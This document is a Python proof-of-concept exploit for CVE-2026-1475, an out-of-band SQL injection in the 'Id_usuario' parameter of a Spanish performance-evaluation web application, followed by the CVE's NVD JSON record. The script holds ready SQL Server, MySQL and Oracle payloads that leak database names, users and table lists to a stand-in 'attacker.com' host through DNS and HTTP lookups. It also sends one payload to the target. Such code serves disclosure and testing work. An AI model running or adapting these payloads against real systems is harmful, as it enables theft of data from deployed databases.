CVE-2026-1475

# CVE-2026-1475 OOB SQL Injection PoC # Target: Performance Evaluation (EDD) application # Endpoint: /evaluacion_acciones_evalua.aspx # Vulnerable Parameter: Id_usuario import requests import sys # Target configuration TARGET_URL = "http://target.com/evaluacion_acciones_evalua.aspx" ATTACKER_SERVER = "attacker.com" def exploit_sql_injection(user_id): """Exploit OOB SQL injection via Id_usuario parameter""" # Payload for SQL Server OOB extraction (example for SQL Server) # This payload attempts to trigger a DNS lookup to attacker server payload_template = f""" '; DECLARE @host VARCHAR(8000); SET @host = (SELECT TOP 1 DB_NAME()) + '.{ATTACKER_SERVER}'; EXEC('master..xp_dirtree ''\\' + @host + '\c$\''); -- """ # Alternative payload for MySQL mysql_payload = f""" ' AND (SELECT LOAD_FILE(CONCAT('\\\\\\\\', (SELECT database()), '.{ATTACKER_SERVER}\\\\test'))) -- """ # Alternative payload for Oracle oracle_payload = f""" ' AND (SELECT UTL_HTTP.REQUEST('http://{ATTACKER_SERVER}/' || (SELECT user FROM dual)) FROM dual) IS NOT NULL -- """ data = { 'Id_usuario': user_id # Original parameter value } # Test with malicious payload malicious_data = { 'Id_usuario': payload_template.strip() } try: print(f"[*] Sending malicious request to {TARGET_URL}") print(f"[*] Payload: {payload_template[:100]}...") response = requests.post( TARGET_URL, data=malicious_data, timeout=30, allow_redirects=False ) print(f"[*] Response Status: {response.status_code}") print(f"[*] Check DNS logs on {ATTACKER_SERVER}") except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") def extract_data_via_oob(data_to_extract): """Extract data using OOB technique""" # SQL Server example - extract table names payload = f""" '; DECLARE @s VARCHAR(8000); SELECT @s = @s + '|' + name FROM sys.tables; EXEC('master..xp_dirtree ''\\' + @s + '.{ATTACKER_SERVER}\''); -- """ return payload if __name__ == "__main__": print("CVE-2026-1475 OOB SQL Injection Tester") print("=" * 50) # Test basic injection exploit_sql_injection("1")

{"cve": {"id": "CVE-2026-1475", "sourceIdentifier": "[email protected]", "published": "2026-01-27T17:16:10.840", "lastModified": "2026-02-10T20:20:35.903", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An out-of-band SQL injection vulnerability (OOB SQLi) has been detected in the Performance Evaluation (EDD) application developed by Gabinete Técnico de Programación. Exploiting this vulnerability in the parameter ‘Id_usuario' in ‘/evaluacion_acciones_evalua.aspx’, could allow an attacker to extract sensitive information from the database through external channels, without the affected application returning the data directly, compromising the confidentiality of the stored information."}, {"lang": "es", "value": "Una vulnerabilidad de inyección SQL fuera de banda (OOB SQLi) ha sido detectada en la aplicación de Evaluación del Desempeño (EDD) desarrollada por Gabinete Técnico de Programación. Explotar esta vulnerabilidad en el parámetro 'Id_usuario' en '/evaluacion_acciones_evalua.aspx', podría permitir a un atacante extraer información sensible de la base de datos a través de canales externos, sin que la aplicación afectada devuelva los datos directamente, comprometiendo la confidencialidad de la información almacenada."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:quatuor:evaluacion_de_desempeno:-:*:*:*:*:*:*:*", "matchCriteriaId": "66ECBB1A-4822-4186-9C8B-49740C8B52A4"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/out-band-sql-injection-quatuor-performance-evaluation", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}